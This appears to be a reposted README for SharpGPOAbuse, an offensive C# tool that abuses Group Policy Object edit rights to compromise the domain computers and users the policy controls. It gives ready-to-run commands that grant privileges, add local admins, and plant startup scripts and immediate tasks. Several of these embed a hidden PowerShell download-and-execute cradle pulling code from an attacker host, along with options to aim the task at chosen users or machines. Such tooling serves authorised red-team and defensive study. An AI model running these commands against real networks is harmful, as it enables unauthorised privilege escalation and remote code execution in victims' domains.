SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user’s edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
More details can be found at the following blog post: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse
Compile Instructions
Make sure the necessary NuGet packages are installed properly and simply build the project in Visual Studio.
Usage
Usage: SharpGPOAbuse.exe <AttackType> <AttackOptions>
Attacks Types
Currently SharpGPOAbuse supports the following options:
| Option | Description |
|---|---|
| –AddUserRights | Add rights to a user |
| –AddLocalAdmin | Add a user to the local admins group |
| –AddComputerScript | Add a new computer startup script |
| –AddUserScript | Configure a user logon script |
| –AddComputerTask | Configure a computer immediate task |
| –AddUserTask | Add an immediate task to a user |
Attack Options
Options required to add new user rights:
–UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
–UserAccount
Set the account to add the new rights.
–GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe –AddUserRights –UserRights “SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight” –UserAccount bob.smith –GPOName “Vulnerable GPO”
Options required to add a new local admin:
–UserAccount
Set the name of the account to be added in local admins.
–GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe –AddLocalAdmin –UserAccount bob.smith –GPOName “Vulnerable GPO”
Options required to add a new user or computer startup script:
–ScriptName
Set the name of the new startup script.
–ScriptContents
Set the contents of the new startup script.
–GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”
If you want to run the malicious script only on a specific user or computer controlled by the vulnerable GPO, you can add an if statement within the malicious script:
SharpGPOAbuse.exe –AddUserScript –ScriptName StartupScript.bat –ScriptContents “if %username%== powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”
Options required to add a new computer or user immediate task:
–TaskName
Set the name of the new computer task.
–Author
Set the author of the new task (use a DA account).
–Command
Command to execute.
–Arguments
Arguments passed to the command.
–GPOName
The name of the vulnerable GPO.
Additional User Task Options:
–FilterEnabled
Enable Target Filtering for user immediate tasks.
–TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format \
–TargetUserSID
The targeted user’s SID.
Additional Computer Task Options:
–FilterEnabled
Enable Target Filtering for computer immediate tasks.
–TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.
Example:
SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO”
If you want to run the malicious task only on a specific user or computer controlled by the vulnerable GPO you can use something similar to the following:
SharpGPOAbuse.exe –AddComputerTask –TaskName “Update” –Author DOMAIN\Admin –Command “cmd.exe” –Arguments “/c powershell.exe -nop -w hidden -c \”IEX ((new-object net.webclient).downloadstring(‘http://10.1.1.10:80/a’))\”” –GPOName “Vulnerable GPO” –FilterEnabled –TargetDnsName target.domain.com
Additional Options
| Option | Description |
|---|---|
| –DomainController | Set the target domain controller |
| –Domain | Set the target domain |
| –Force | Overwrite existing files if required |
Docker is a powerful open-source containerization platform that allows developers to build, test, and deploy…
Docker is one of the most widely used containerization platforms. But there may come a…
Introduction Google Dorking is a technique where advanced search operators are used to uncover information…
Introduction In cybersecurity and IT operations, logging fundamentals form the backbone of monitoring, forensics, and…
What is Networking? Networking brings together devices like computers, servers, routers, and switches so they…
Introduction In the world of Open Source Intelligence (OSINT), anonymity and operational security (OPSEC) are…